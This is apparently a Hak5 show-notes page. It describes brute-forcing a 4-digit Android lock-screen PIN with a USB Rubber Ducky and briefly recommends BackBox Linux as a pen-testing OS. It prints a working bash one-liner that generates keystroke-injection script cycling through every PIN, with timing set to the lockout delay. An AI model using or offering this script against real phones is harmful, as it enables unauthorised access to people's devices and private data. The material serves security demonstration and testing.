Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky


Hack Any 4-digit Android PIN in 16 hours with a USB Rubber Ducky

This time on the show, an online brute force attack against Android successfully defeats 4-digit PIN codes in about 16 hours using the USB Rubber Ducky without wiping user data. Plus, BackBox Linux - is this a pen-testing OS for every day use? All that and more, this time on Hak5.

Android Brute Force Attack with USB Rubber Ducky

Brute forcing Android PIN authentication with a USB Rubber Ducky. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it has run as expected.

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

BackBox Linux

Daniel says: Have you heard of Back Box? It's an Ubuntu based OS with a focus on pen testing with an XFCE desktop. But, unlike backtrack it is actually functional as a day to day OS. I've been using it as my main OS for 5 months now and I truthfully believe it doesn't receive enough attention.

Download Back Box Linux